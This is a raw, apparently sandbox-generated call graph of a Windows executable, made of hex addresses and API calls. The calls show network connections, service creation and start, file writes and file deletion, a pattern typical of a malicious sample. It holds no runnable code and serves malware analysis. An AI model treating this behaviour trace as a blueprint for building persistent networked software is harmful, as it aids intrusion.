86999->87006 87001 44b0ae 87002 44b0d8 CloseHandle 87001->87002 87001->87003 87002->87003 87003->86989 87004 44a97c SetThreadPriority 87003->87004 87004->86989 87005->86984 87007 46ff65 87006->87007 87017 46ff49 87006->87017 87023 472b4f TlsGetValue 87007->87023 87017->87001 87024 472b64 ___set_flsgetvalue 87023->87024 87025 46ff6b 87023->87025 87026 472b6f TlsSetValue 87024->87026 87027 476073 87025->87027 87026->87025 87028 47607c __calloc_impl 87027->87028 87111 40b650 87112 46a7e7 _malloc 4 API calls 87111->87112 87113 40b66d _memset _memset 87112->87113 87123 40b300 WSAStartup 87113->87123 87115 40b6b5 _memset _sprintf _memset _strlen 87116 413a70 87115->87116 87117 40b734 _strlen 87116->87117 87118 40b7da _strlen 87117->87118 87119 40b74e 87117->87119 87122 40b7b8 87118->87122 87120 40b790 _strlen 87119->87120 87127 46c1c6 8 API calls __strupr_s_l 87120->87127 87124 40b361 87123->87124 87126 40b395 87123->87126 87125 40b37f __strlwr 87124->87125 87124->87126 87125->87126 87126->87115 87127->87122 87128 4202d0 87131 450784 __EH_prolog3 87128->87131 87130 420329 87136 4043f0 87131->87136 87133 45079d 87144 404310 87133->87144 87135 450870 87135->87130 87137 404404 codecvt 87136->87137 87148 4044a0 87137->87148 87140 40448c 87140->87133 87141 404461 87143 404740 codecvt 7 API calls 87141->87143 87142 40446a _strlen 87142->87141 87143->87140 87145 404340 87144->87145 87146 404329 87144->87146 87145->87135 87147 44c669 4 API calls 87146->87147 87147->87145 87149 4044b3 87148->87149 87150 404454 87148->87150 87149->87150 87152 404510 5 API calls codecvt 87149->87152 87150->87140 87150->87141 87150->87142 87152->87150 87153 6a736a64 87156 6a6e4cc7 87153->87156 87155 6a736a87 87157 6a6e4c67 87156->87157 87160 6a6e4c75 87157->87160 87165 6a6e4cbb 87157->87165 87173 6a6de890 87157->87173 87159 6a6e4c9c 87185 6a6fde00 87159->87185 87160->87159 87162 6a6de890 ctype 80 API calls 87160->87162 87161 6a6e4cd8 select 87164 6a6e4c03 87161->87164 87161->87165 87162->87159 87166 6a6fd7eb ___ansicp 5 API calls 87164->87166 87165->87161 87167 6a6e4d13 send 87165->87167 87170 6a6e4d45 87165->87170 87168 6a6e4c16 87166->87168 87167->87165 87169 6a6e4d2c WSAGetLastError 87167->87169 87168->87155 87169->87164 87169->87165 87171 6a6fd7eb ___ansicp 5 API calls 87170->87171 87172 6a6e4d58 87171->87172 87172->87155 87174 6a6de8a1 87173->87174 87175 6a6de7c0 87174->87175 87178 6a6de850 87174->87178 87196 6a6f1244 87175->87196 87177 6a6de7f4 87201 6a6ff161 87177->87201 87182 6a6de87e 87178->87182 87210 6a6de840 80 API calls ctype 87178->87210 87182->87160 87183 6a6de80c 87183->87160 87186 6a6fde2d 87185->87186 87187 6a6fde10 87185->87187 87186->87187 87189 6a6fde34 87186->87189 87188 6a701068 __cftof2_l 67 API calls 87187->87188 87190 6a6fde15 87188->87190 87237 6a707212 103 API calls 14 library calls 87189->87237 87236 6a700d34 6 API calls 2 library calls 87190->87236 87193 6a6fde5a 87194 6a6fde25 87193->87194 87238 6a7070ae 101 API calls 7 library calls 87193->87238 87194->87165 87197 6a6f1258 87196->87197 87198 6a6de7e9 87196->87198 87211 6a6fdb7c 87197->87211 87198->87177 87200 6a6de840 80 API calls ctype 87198->87200 87200->87177 87204 6a6ff175 _memset 87201->87204 87207 6a6ff171 _realloc 87201->87207 87202 6a6ff17a 87203 6a701068 __cftof2_l 67 API calls 87202->87203 87209 6a6ff17f 87203->87209 87204->87202 87206 6a6ff1c4 87204->87206 87204->87207 87206->87207 87208 6a701068 __cftof2_l 67 API calls 87206->87208 87207->87183 87208->87209 87235 6a700d34 6 API calls 2 library calls 87209->87235 87210->87182 87212 6a6fdc2f 87211->87212 87217 6a6fdb8e 87211->87217 87234 6a706c7b 6 API calls __decode_pointer 87212->87234 87214 6a6fdc35 87216 6a701068 __cftof2_l 66 API calls 87214->87216 87215 6a6fdb9f 87215->87217 87229 6a706c33 67 API calls 2 library calls 87215->87229 87230 6a706a88 67 API calls 7 library calls 87215->87230 87231 6a6fe3b5 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 87215->87231 87223 6a6fdc27 87216->87223 87217->87215 87221 6a6fdbeb HeapAlloc 87217->87221 87217->87223 87224 6a6fdc1b 87217->87224 87227 6a6fdc20 87217->87227 87232 6a6fdb2d 67 API calls 4 library calls 87217->87232 87233 6a706c7b 6 API calls __decode_pointer 87217->87233 87221->87217 87223->87198 87226 6a701068 __cftof2_l 66 API calls 87224->87226 87226->87227 87228 6a701068 __cftof2_l 66 API calls 87227->87228 87228->87223 87229->87215 87230->87215 87232->87217 87233->87217 87234->87214 87237->87193 87238->87194 87239 45b065 87240 45b075 87239->87240 87241 45b0b2 87240->87241 87242 45b079 CoGetClassObject 87240->87242 87243 45b099 87242->87243 87244 40ece0 87245 40ed02 87244->87245 87246 40ed06 87245->87246 87247 40ed0b _memset _memset 87245->87247 87247->87246 87248 40ba60 _memset 87249 40b300 2 API calls 87248->87249 87250 40ba9c _memset _strlen 87249->87250 87251 413a70 87250->87251 87252 40badf _strlen 87251->87252 87253 40baf5 87252->87253 87254 4177e0 87255 417801 87254->87255 87256 4177fc 87254->87256 87264 416710 MultiByteToWideChar 87255->87264 87258 41780a 87258->87256 87259 4043f0 8 API calls 87258->87259 87260 417872 87259->87260 87268 416790 87260->87268 87265 416786 87264->87265 87266 41673a 87264->87266 87265->87258 87267 416756 MultiByteToWideChar 87266->87267 87267->87265 87269 4043f0 8 API calls 87268->87269 87270 4167b6 87269->87270 87271 4167ef _memset 87270->87271 87272 4167c5 87270->87272 87273 4167ce _strlen 87270->87273 87274 416812 87271->87274 87275 4068a0 7 API calls 87272->87275 87273->87272 87276 416822 _strlen 87274->87276 87277 416819 87274->87277 87275->87271 87276->87277 87278 4068a0 7 API calls 87277->87278 87279 416841 87278->87279 87280 416853 _strlen 87279->87280 87281 41684a 87279->87281 87280->87281 87282 4068a0 7 API calls 87281->87282 87283 416874 87282->87283 87299 406250 87283->87299 87296 416883 codecvt 87300 406264 87299->87300 87302 40625f 87299->87302 87300->87302 87344 46a003 __mbsstr_l 87300->87344 87302->87296 87344->87302 87366 424a60 87373 445e71 87366->87373 87368 424a99 87377 45418e 87368->87377 87371 424aae SendMessageA 87372 424acf 87371->87372 87374 445e7f 87373->87374 87382 456e5a __EH_prolog3_catch 87374->87382 87376 445e8b 87376->87368 87411 448ebc 87377->87411 87379 4541a0 87425 44488f 87379->87425 87383 456e79 87382->87383 87386 456e6f ctype 87382->87386 87394 456909 KiUserExceptionDispatcher task 87383->87394 87385 456e82 87385->87386 87395 456909 KiUserExceptionDispatcher task 87385->87395 87386->87376 87388 456e8f ctype 87388->87386 87396 466bda 87388->87396 87392 456ec9 87401 456ad0 6 API calls ctype 87392->87401 87394->87385 87395->87388 87397 466be5 87396->87397 87398 456ebe 87396->87398 87402 44ed32 87397->87402 87398->87392 87400 44a579 KiUserExceptionDispatcher task 87398->87400 87401->87386 87403 44ed3e 87402->87403 87404 44ed5f 87402->87404 87403->87404 87406 44ed44 87403->87406 87410 44a5b1 KiUserExceptionDispatcher task 87404->87410 87408 4428ed ctype 4 API calls 87406->87408 87409 44ed51 87408->87409 87409->87398 87412 448ec9 87411->87412 87413 448ede _memset 87412->87413 87424 448ed6 87412->87424 87414 448f01 87413->87414 87415 448f32 87414->87415 87429 448bbb 9 API calls 87414->87429 87417 448f54 87415->87417 87430 448bbb 9 API calls 87415->87430 87418 448f7b 87417->87418 87431 448bbb 9 API calls 87417->87431 87421 448fa1 87418->87421 87432 448e78 9 API calls 87418->87432 87421->87424 87433 448e78 9 API calls 87421->87433 87424->87379 87426 44489e 87425->87426 87428 447e56 2 API calls 87426->87428 87427 424aaa 87427->87371 87427->87372 87428->87427 87429->87415 87430->87417 87431->87418 87432->87421 87433->87424 87434 423360 87435 447e56 2 API calls 87434->87435 87436 4233a4 87435->87436 87437 4233a8 SendMessageA 87436->87437 87438 4233c9 87436->87438 87437->87438 87439 40a86a GetFileAttributesA 87440 40a88b 87439->87440 87441 6a6d1840 87444 6a6e19f0 87441->87444 87443 6a6d184e 87459 6a6e2b30 87444->87459 87446 6a6e19f9 87447 6a6e1a43 87446->87447 87469 6a6dbf00 87446->87469 87447->87443 87449 6a6e1a04 87450 6a6e1a1e DeleteFileA GetLastError 87449->87450 87451 6a6e1a08 87449->87451 87450->87447 87453 6a6e1a32 87450->87453 87475 6a6e10a0 20 API calls 87451->87475 87476 6a6e1950 104 API calls 3 library calls 87453->87476 87454 6a6e1a0f 87454->87450 87457 6a6e2b30 16 API calls 87454->87457 87456 6a6e1a3b 87456->87443 87458 6a6e1a18 87457->87458 87458->87447 87458->87450 87460 6a6e2b4c _strrchr 87459->87460 87461 6a6e2b53 87460->87461 87464 6a6e2b68 __mbsstr_l _realloc 87460->87464 87462 6a6fd7eb ___ansicp 5 API calls 87461->87462 87463 6a6e2b61 87462->87463 87463->87446 87477 6a6e2680 87464->87477 87466 6a6e2baa 87467 6a6fd7eb ___ansicp 5 API calls 87466->87467 87468 6a6e2bc1 87467->87468 87468->87446 87470 6a6dbf1c GetModuleHandleA GetProcAddress 87469->87470 87471 6a6dbf45 87470->87471 87472 6a6dbf4c GetCurrentProcess 87471->87472 87473 6a6dbf49 87471->87473 87474 6a6dbf5a 87472->87474 87473->87449 87474->87449 87475->87454 87476->87456 87478 6a6e268e 87477->87478 87479 6a6e271d 87477->87479 87478->87479 87480 6a6e2696 OpenSCManagerA 87478->87480 87479->87466 87481 6a6e26ac 87480->87481 87482 6a6e26b2 87480->87482 87481->87466 87490 6a6e2640 CreateServiceA GetLastError CloseServiceHandle 87482->87490 87484 6a6e26be 87485 6a6e26c8 OpenServiceA 87484->87485 87486 6a6e2711 CloseServiceHandle 87484->87486 87485->87486 87487 6a6e26db StartServiceA 87485->87487 87486->87466 87488 6a6e26ea GetLastError CloseServiceHandle 87487->87488 87489 6a6e2702 CloseServiceHandle CloseServiceHandle 87487->87489 87488->87466 87489->87466 87490->87484 87491 409470 87499 408090 87491->87499 87500 4080c4 87499->87500 87578 437a40 87500->87578 87503 408129 _strlen 87504 40811d 87503->87504 87506 404740 codecvt 7 API calls 87504->87506 87508 408157 _memset _memset 87506->87508 87507 408217 87509 4082b5 87507->87509 87510 408238 87507->87510 87508->87507 87511 406b30 8 API calls 87509->87511 87645 40ade0 5 API calls codecvt 87510->87645 87512 4082b3 87511->87512 87513 4043f0 8 API calls 87512->87513 87518 4082d9 87513->87518 87515 408264 87516 406b30 8 API calls 87515->87516 87517 40827f 87516->87517 87519 404310 ctype 4 API calls 87517->87519 87611 433150 87518->87611 87520 408299 87519->87520 87522 404310 ctype 4 API calls 87520->87522 87522->87512 87523 408347 87524 4083bc 87523->87524 87526 408362 87523->87526 87579 46a7e7 _malloc 4 API calls 87578->87579 87583 437a63 87579->87583 87580 437a76 _memset 87580->87583 87581 4080fe 87581->87503 87581->87504 87581->87508 87582 437aa2 _rand 87582->87583 87583->87580 87583->87581 87583->87582 87584 437aef 87583->87584 87584->87581 87586 437b9b 87584->87586 87646 46e3aa 87584->87646 87598 437dc0 87586->87598 87660 4364a0 87586->87660 87588 437d9e 87590 4364a0 10 API calls 87588->87590 87589 46a7e7 _malloc 4 API calls 87591 437ef2 87589->87591 87590->87598 87592 437efe _memset 87591->87592 87597 437f2f 87591->87597 87593 46e3aa 9 API calls 87592->87593 87593->87597 87594 437fa6 87594->87581 87595 4364a0 10 API calls 87594->87595 87599 437fe7 strtoxq 87595->87599 87597->87594 87664 436f60 46 API calls 3 library calls 87597->87664 87598->87589 87665 438380 __localtime64_s codecvt 87599->87665 87601 4380a4 87666 438420 __localtime64_s codecvt 87601->87666 87603 4380b4 87667 4384b0 __localtime64_s codecvt 87603->87667 87605 4380c4 87628 43316b 87611->87628 87612 4331a3 _memset 87612->87628 87613 4331fd _rand 87613->87628 87614 433273 _memset 87614->87628 87615 4338fa 87618 404700 codecvt 4 API calls 87615->87618 87616 4338df _strlen 87616->87615 87616->87628 87617 4332b1 _strlen 87617->87628 87622 433884 87618->87622 87619 433921 87621 404700 codecvt 4 API calls 87619->87621 87620 433300 _memset _memset 87620->87628 87621->87622 87622->87523 87625 4043f0 8 API calls 87625->87628 87627 404700 RtlAllocateHeap RtlFreeHeap __amsg_exit RtlAllocateHeap codecvt 87627->87628 87628->87612 87628->87613 87628->87614 87628->87615 87628->87616 87628->87617 87628->87619 87628->87620 87628->87625 87628->87627 87629 4068a0 7 API calls 87628->87629 87630 43347c _strlen 87628->87630 87631 4335a8 _strlen 87628->87631 87632 44a5b1 KiUserExceptionDispatcher task 87628->87632 87634 433864 87628->87634 87697 450925 87628->87697 87711 432ed0 87628->87711 87740 435f60 87628->87740 87750 4366a0 _strlen _memcmp 87628->87750 87751 436730 33 API calls __fread_nolock 87628->87751 87754 450a5b 5 API calls ctype 87628->87754 87629->87628 87630->87628 87631->87628 87632->87628 87635 43386a 87634->87635 87636 43388f 87634->87636 87752 450a5b 5 API calls ctype 87635->87752 87753 450a5b 5 API calls ctype 87636->87753 87641 43387c 87643 404700 codecvt 4 API calls 87641->87643 87642 4338a1 87644 404700 codecvt 4 API calls 87642->87644 87643->87622 87644->87622 87645->87515 87647 46e3de 87646->87647 87650 46e3be 87646->87650 87648 472b4f ___set_flsgetvalue 2 API calls 87647->87648 87649 46e3e4 87648->87649 87651 476073 _copy_environ __calloc_impl 87649->87651 87650->87584 87652 46e3f0 87651->87652 87653 472d3d __getptd 8 API calls 87652->87653 87659 46e406 87652->87659 87655 46e3fd 87653->87655 87654 46a8b1 __setmbcp 4 API calls 87656 46e448 87654->87656 87658 472bdd __getptd 4 API calls 87655->87658 87656->87650 87657 46e44e __dosmaperr 87656->87657 87657->87650 87658->87659 87659->87650 87659->87654 87661 4364a9 codecvt 87660->87661 87671 46eb5c 87661->87671 87663 436616 codecvt 87663->87588 87664->87597 87665->87601 87666->87603 87667->87605 87674 46e8a7 87671->87674 87673 46eb6b 87673->87663 87675 46e8bf 87674->87675 87676 46e8e1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z strtoxq __allrem 87674->87676 87675->87673 87676->87675 87677 46eb24 __gmtime64_s 87676->87677 87678 46eaa5 87676->87678 87677->87675 87691 47c5a0 87678->87691 87680 46eaaa __get_daylight 87681 46eac5 __get_daylight 87680->87681 87682 46eab8 87680->87682 87684 46ead3 87681->87684 87685 46eae0 __localtime64_s 87681->87685 87695 473090 _memset 87682->87695 87696 473090 _memset 87684->87696 87685->87675 87688 46eafd 87685->87688 87686 46eac2 87686->87681 87688->87675 87692 47c5ac 87691->87692 87693 476312 __setmbcp 4 API calls 87692->87693 87694 47c5bd _expandtime 87692->87694 87693->87694 87694->87680 87695->87686 87704 450938 87697->87704 87699 45094b 87756 4508fa RtlAllocateHeap RtlFreeHeap __amsg_exit RtlAllocateHeap ctype 87699->87756 87701 450973 87702 4428ed ctype 4 API calls 87701->87702 87710 450956 87702->87710 87703 450997 87703->87710 87757 4508fa RtlAllocateHeap RtlFreeHeap __amsg_exit RtlAllocateHeap ctype 87703->87757 87704->87699 87704->87701 87704->87703 87705 450a0a 87704->87705 87755 44a5b1 KiUserExceptionDispatcher task 87704->87755 87707 4428ed ctype 4 API calls 87705->87707 87708 450a13 87707->87708 87710->87628 87712 432ee6 87711->87712 87713 432eed 87711->87713 87712->87628 87714 46a7e7 _malloc 4 API calls 87713->87714 87715 432efc 87714->87715 87715->87712 87716 432f0f _memset 87715->87716 87742 435f81 87740->87742 87744 435f93 87742->87744 87745 435ffe _memset _memset 87742->87745 87746 4360a0 _strlen 87742->87746 87747 4360f3 _strlen 87742->87747 87748 404740 7 API calls codecvt 87742->87748 87749 436146 _strlen 87742->87749 87793 433c80 socket 87742->87793 87796 434d70 _memset 87742->87796 87744->87628 87745->87742 87746->87742 87747->87742 87748->87742 87749->87742 87750->87628 87751->87628 87752->87641 87753->87642 87754->87628 87756->87710 87757->87710 87794 433cc3 ioctlsocket 87793->87794 87795 433cbc 87793->87795 87794->87795 87795->87742 87799 434dc2 87796->87799 87797 434e93 87797->87742 87798 434e62 select 87798->87797 87798->87799 87799->87797 87799->87798 87800 434ebe recv 87799->87800 87800->87797 87800->87799 87802 402cf0 87803 402d05 87802->87803 87806 420770 87803->87806 87807 4207d7 87806->87807 87808 42080d _memset _memset 87806->87808 87807->87808 87820 420690 _memset 87808->87820 87821 409670 87822 433150 71 API calls 87821->87822 87823 4096ea 87822->87823 87824 4043f0 8 API calls 87823->87824 87828 4096f6 87823->87828 87825 409731 87824->87825 87829 40c7e0 9 API calls codecvt 87825->87829 87827 409736 _strlen 87827->87828 87829->87827 87830 40a770 87831 408640 Sleep 87830->87831 87832 40a778 87831->87832 87833 40a781 IWBE 87832->87833 87834 40a78b 87832->87834 87833->87834 87835 42bef0 87836 4428ed ctype 4 API calls 87835->87836 87837 42bf03 87836->87837 87844 42a320 87837->87844 87839 42bf6d 87856 42a410 87839->87856 87841 42bf79 87861 42c150 87841->87861 87845 42a354 87844->87845 87850 42a38e codecvt 87844->87850 87846 42a366 87845->87846 87847 42a36f _strlen 87845->87847 87848 404740 codecvt 7 API calls 87846->87848 87847->87846 87848->87850 87849 445e71 7 API calls 87851 42a3ab 87849->87851 87850->87849 87865 453f74 87851->87865 87854 42a3d7 SendMessageA 87855 42a3f4 87854->87855 87855->87839 87857 42a433 _strlen 87856->87857 87858 42a42a 87856->87858 87857->87858 87859 404740 codecvt 7 API calls 87858->87859 87860 42a452 87859->87860 87860->87841 87862 42c01d 87861->87862 87864 42c170 87861->87864 87864->87862 87868 44a5b1 KiUserExceptionDispatcher task 87864->87868 87867 44488f 2 API calls 87865->87867 87866 42a3be 87866->87854 87866->87855 87867->87866 87869 42c6f0 87870 447e56 2 API calls 87869->87870 87871 42c732 87870->87871 87872 42c736 SendMessageA 87871->87872 87873 42c756 87871->87873 87872->87873 87874 42f370 87875 4428ed ctype 4 API calls 87874->87875 87876 42f383 87875->87876 87877 6a6d18d0 87880 6a6e2ad0 87877->87880 87879 6a6d18d5 87881 6a6e2ae2 CreateFileA 87880->87881 87882 6a6e2b0c 87881->87882 87883 6a6e2b1e 87882->87883 87884 6a6e2b11 CloseHandle 87882->87884 87883->87883 87884->87879 87885 6a6d2150 87886 6a6d217b _memset 87885->87886 87887 6a6fde00 _sprintf 103 API calls 87886->87887 87888 6a6d21a2 87887->87888 87889 6a6fe0d8 __wfopen_s 161 API calls 87888->87889 87890 6a6d21b6 87889->87890 87891 6a6d21c0 OutputDebugStringA OutputDebugStringA 87890->87891 87892 6a6d21df 87890->87892 87896 6a6fe1a2 106 API calls 5 library calls 87891->87896 87894 6a6fd7eb ___ansicp 5 API calls 87892->87894 87895 6a6d2209 87894->87895 87896->87892 87897 40cb7d 87898 40cb85 87897->87898 87899 40cb8a 87897->87899 87900 40cc1d CloseHandle 87899->87900 87901 40cbc9 _memset _strlen 87899->87901 87902 40cbe3 _strncpy WriteFile 87899->87902 87900->87898 87901->87899 87902->87899 87903 6a6e1a50 87904 6a6e1a8e _memset _strncpy 87903->87904 87917 6a6e3c40 87904->87917 87907 6a6e1ae8 87910 6a6fd7eb ___ansicp 5 API calls 87907->87910 87909 6a6e1ad2 87946 6a6edee0 170 API calls 87909->87946 87912 6a6e1b01 87910->87912 87913 6a6e1ae1 87913->87907 87914 6a6e1b08 87913->87914 87915 6a6fd7eb ___ansicp 5 API calls 87914->87915 87916 6a6e1b1e 87915->87916 87918 6a6e3c94 ctype 87917->87918 87944 6a6e3cab _memset _realloc 87918->87944 88039 6a6dea00 80 API calls ctype 87918->88039 87923 6a6fd7eb ___ansicp 5 API calls 87924 6a6e1abd 87923->87924 87924->87907 87945 6a6dbcb0 129 API calls 5 library calls 87924->87945 87927 6a6e3e98 WSAStartup gethostbyname 87928 6a6e3ebf WSACleanup 87927->87928 87927->87944 87928->87944 87930 6a6e3f11 WSACleanup 88041 6a6e4600 87930->88041 87933 6a6e4600 110 API calls 87933->87944 87934 6a6e3ee6 inet_ntoa 88040 6a6f1a9c 81 API calls ctype 87934->88040 87936 6a6e4152 88051 6a6ee232 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 87936->88051 87938 6a6e4157 88052 6a6f1951 5 API calls 3 library calls 87938->88052 87940 6a6e4280 80 API calls 87940->87944 87941 6a6e4120 87941->87923 87944->87927 87944->87930 87944->87933 87944->87934 87944->87936 87944->87938 87944->87940 87944->87941 87947 6a6ff945 GetSystemTimeAsFileTime 87944->87947 87949 6a6fe2fd 87944->87949 87952 6a6fe30f 87944->87952 87955 6a6e46c0 87944->87955 87968 6a6f181b 87944->87968 87984 6a6e39a0 87944->87984 88009 6a6e47a0 80 API calls ctype 87944->88009 88010 6a6e52c0 87944->88010 88050 6a6f1951 5 API calls 3 library calls 87944->88050 87945->87909 87946->87913 87948 6a6ff975 __aulldiv 87947->87948 87948->87944 88053 6a705883 87949->88053 87953 6a705883 __getptd 67 API calls 87952->87953 87954 6a6fe314 87953->87954 87954->87944 87957 6a6e46f5 _memset __mbsstr_l 87955->87957 87956 6a6e4786 87958 6a6fd7eb ___ansicp 5 API calls 87956->87958 87957->87956 87960 6a6e471a __mbschr_l 87957->87960 87959 6a6e4798 87958->87959 87959->87944 87961 6a6e472d 87960->87961 87962 6a6e4743 87960->87962 88059 6a7000d8 67 API calls _vscan_fn 87961->88059 88060 6a7000d8 67 API calls _vscan_fn 87962->88060 87965 6a6e473e 87966 6a6fd7eb ___ansicp 5 API calls 87965->87966 87967 6a6e477f 87966->87967 87967->87944 87974 6a6f182e 87968->87974 87970 6a6f1869 88062 6a6ee09c 87970->88062 87972 6a6f188d 87977 6a6f1841 moneypunct ctype 87972->87977 88067 6a6f17c7 80 API calls ctype 87972->88067 87974->87970 87974->87972 87974->87977 87978 6a6f1900 87974->87978 88061 6a6ee232 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 87974->88061 87977->87944 87979 6a6ee09c moneypunct 67 API calls 87978->87979 87980 6a6f1909 87979->87980 88068 6a6ee30d 67 API calls 2 library calls 87980->88068 87982 6a6f1922 88069 6a6f17c7 80 API calls ctype 87982->88069 87985 6a6fdb7c _malloc 67 API calls 87984->87985 87986 6a6e39d5 _memset 87985->87986 87987 6a6e39de 87986->87987 87988 6a6e3a01 CreateEventA 87986->87988 87987->87944 87988->87987 87990 6a6e3a18 87988->87990 87989 6a6e4600 110 API calls 87989->87990 87990->87989 87993 6a6e3aba WaitForSingleObject 87990->87993 88070 6a6e4280 87990->88070 88078 6a6fdd47 87990->88078 87994 6a6e3acd ctype 87993->87994 87996 6a6e3ae2 87994->87996 88113 6a6dea00 80 API calls ctype 87994->88113 87999 6a6e3b27 87996->87999 88114 6a6de690 87996->88114 87997 6a6e3b7e 88099 6a6e5c70 87997->88099 87999->87997 88000 6a6e3ba4 87999->88000 88124 6a6de840 80 API calls ctype 87999->88124 88003 6a6ff161 _memcpy_s 67 API calls 88000->88003 88003->87997 88009->87944 88201 6a6e4a40 socket ioctlsocket 88010->88201 88012 6a6e53fc 88013 6a6e540e 88012->88013 88014 6a6e5403 closesocket 88012->88014 88016 6a6fd7eb ___ansicp 5 API calls 88013->88016 88014->88013 88018 6a6e5424 88016->88018 88017 6a6e52e5 88017->88012 88019 6a6e542b 88017->88019 88215 6a6e4d60 88017->88215 88245 6a6e4be0 109 API calls 4 library calls 88017->88245 88018->87944 88021 6a6e543d 88019->88021 88022 6a6e5432 closesocket 88019->88022 88023 6a6fd7eb ___ansicp 5 API calls 88021->88023 88022->88021 88026 6a6e5453 88023->88026 88024 6a6e548b 88027 6a6e549d 88024->88027 88028 6a6e5492 closesocket 88024->88028 88025 6a6e545a 88029 6a6e546e 88025->88029 88030 6a6e5463 closesocket 88025->88030 88026->87944 88031 6a6fd7eb ___ansicp 5 API calls 88027->88031 88028->88027 88032 6a6fd7eb ___ansicp 5 API calls 88029->88032 88030->88029 88035 6a6e46c0 67 API calls 88036 6a6e5302 _memset 88035->88036 88036->88012 88036->88017 88036->88024 88036->88025 88036->88035 88036->88036 88037 6a6de690 80 API calls ctype 88036->88037 88038 6a6e4a40 89 API calls 88036->88038 88037->88036 88038->88036 88040->87944 88042 6a6e462e ctype 88041->88042 88043 6a6e4643 88042->88043 88254 6a6dea00 80 API calls ctype 88042->88254 88045 6a6e4681 88043->88045 88046 6a6e4669 88043->88046 88048 6a6de690 ctype 80 API calls 88045->88048 88255 6a6f1763 110 API calls ctype 88046->88255 88049 6a6e4672 88048->88049 88049->87944 88050->87944 88051->87938 88052->87941 88054 6a70580a __getptd_noexit 67 API calls 88053->88054 88055 6a70588b 88054->88055 88056 6a6fe307 88055->88056 88058 6a6fe361 67 API calls 3 library calls 88055->88058 88056->87944 88058->88056 88059->87965 88060->87965 88061->87974 88065 6a6ee0a4 88062->88065 88063 6a6fdb7c _malloc 67 API calls 88063->88065 88064 6a6ee0c6 88066 6a6f17c7 80 API calls ctype 88064->88066 88065->88063 88065->88064 88066->87977 88067->87977 88068->87982 88069->87977 88071 6a6e429d 88070->88071 88075 6a6e42a7 88070->88075 88125 6a6dea00 80 API calls ctype 88071->88125 88074 6a6de890 ctype 80 API calls 88074->88075 88075->88074 88076 6a6ff161 _memcpy_s 67 API calls 88075->88076 88077 6a6e4321 88075->88077 88126 6a6dea00 80 API calls ctype 88075->88126 88076->88075 88077->87990 88079 6a6fdd7b 88078->88079 88080 6a6fdd5b 88078->88080 88082 6a705695 ___set_flsgetvalue 8 API calls 88079->88082 88081 6a701068 __cftof2_l 67 API calls 88080->88081 88083 6a6fdd60 88081->88083 88084 6a6fdd81 88082->88084 88127 6a700d34 6 API calls 2 library calls 88083->88127 88086 6a706fc2 __calloc_crt 67 API calls 88084->88086 88087 6a6fdd8d 88086->88087 88088 6a6fdddf 88087->88088 88089 6a705883 __getptd 67 API calls 88087->88089 88128 6a6fe26f 67 API calls 7 library calls 88088->88128 88091 6a6fdd9a 88089->88091 88093 6a705723 __getptd_noexit 67 API calls 88091->88093 88092 6a6fdde5 88094 6a6fdd70 88092->88094 88129 6a70108e 67 API calls 3 library calls 88092->88129 88095 6a6fdda3 CreateThread 88093->88095 88094->87990 88100 6a6f181b 81 API calls 88099->88100 88101 6a6e5caa 88100->88101 88166 6a6e4340 88101->88166 88115 6a6de69c 88114->88115 88122 6a6de6a6 88114->88122 88198 6a6de630 80 API calls ctype 88115->88198 88118 6a6de6a1 88118->87999 88119 6a6de890 ctype 80 API calls 88119->88122 88121 6a6ff161 _memcpy_s 67 API calls 88121->88122 88122->88119 88122->88121 88123 6a6de712 88122->88123 88199 6a6dea00 80 API calls ctype 88122->88199 88200 6a6ff251 67 API calls 2 library calls 88122->88200 88123->87999 88124->88000 88128->88092 88129->88094 88169 6a6e434f 88166->88169 88198->88118 88200->88122 88202 6a6e4b0a 88201->88202 88203 6a6e4a8f 88201->88203 88205 6a6fd7eb ___ansicp 5 API calls 88202->88205 88203->88202 88204 6a6e4a9f htons 88203->88204 88206 6a6e4ada 88204->88206 88207 6a6e4ae2 inet_addr connect 88204->88207 88208 6a6e4bd2 88205->88208 88209 6a6de890 ctype 80 API calls 88206->88209 88207->88202 88210 6a6e4b11 WSAGetLastError 88207->88210 88208->88017 88209->88207 88210->88202 88212 6a6e4b22 88210->88212 88211 6a6e4b30 select 88211->88202 88211->88212 88212->88202 88212->88211 88213 6a6e4b8f __WSAFDIsSet 88212->88213 88213->88202 88214 6a6e4ba5 __WSAFDIsSet 88213->88214 88214->88202 88214->88211 88217 6a6e4db6 _memset 88215->88217 88216 6a6e4dd0 select 88216->88217 88241 6a6e4dff 88216->88241 88217->88216 88218 6a6e4e06 recv 88217->88218 88221 6a6e4e5b _strncmp 88217->88221 88217->88241 88218->88217 88218->88241 88219 6a6fd7eb ___ansicp 5 API calls 88220 6a6e5296 88219->88220 88220->88036 88221->88241 88246 6a7000d8 67 API calls _vscan_fn 88221->88246 88223 6a6e4ed1 88224 6a6e4600 110 API calls 88223->88224 88226 6a6e4fc2 __mbsstr_l 88223->88226 88223->88241 88225 6a6e4efc 88224->88225 88225->88226 88247 6a7006e6 77 API calls __mbsstr_l 88225->88247 88226->88241 88253 6a7000d8 67 API calls _vscan_fn 88226->88253 88229 6a6e4f1d 88229->88226 88234 6a6e5083 _memset moneypunct 88240 6a6e515b select 88234->88240 88234->88241 88242 6a6e5196 recv 88234->88242 88240->88234 88240->88241 88241->88219 88242->88241 88245->88017 88246->88223 88247->88229 88253->88234 88255->88049 88256 6a6e1f50 88257 6a6e1f77 88256->88257 88258 6a6dbf00 3 API calls 88257->88258 88259 6a6e1f7c 88258->88259 88260 6a6e1f8c 88259->88260 88261 6a6e1f80 88259->88261 88292 6a6e1d50 303 API calls 2 library calls 88260->88292 88291 6a6e1ba0 282 API calls 2 library calls 88261->88291 88264 6a6e1f9c 88274 6a6e1f85 88264->88274 88293 6a6e1d50 303 API calls 2 library calls 88264->88293 88267 6a6fd7eb ___ansicp 5 API calls 88269 6a6e20d1 88267->88269 88268 6a6e1fbb 88270 6a6e201e 88268->88270 88275 6a6e1fc4 _memset 88268->88275 88284 6a6e1b30 88270->88284 88273 6a6e2027 Sleep 88301 6a6e1d50 303 API calls 2 library calls 88273->88301 88274->88267 88294 6a6e1100 88275->88294 88280 6a6e2041 _memset 88280->88274 88282 6a6e1100 106 API calls 88280->88282 88283 6a6e208a DeleteFileA 88282->88283 88285 6a6e1b45 88284->88285 88286 6a6dbf00 3 API calls 88285->88286 88287 6a6e1b4a CreateFileA 88286->88287 88289 6a6e1b7d 88287->88289 88290 6a6e1b71 CloseHandle 88287->88290 88289->88273 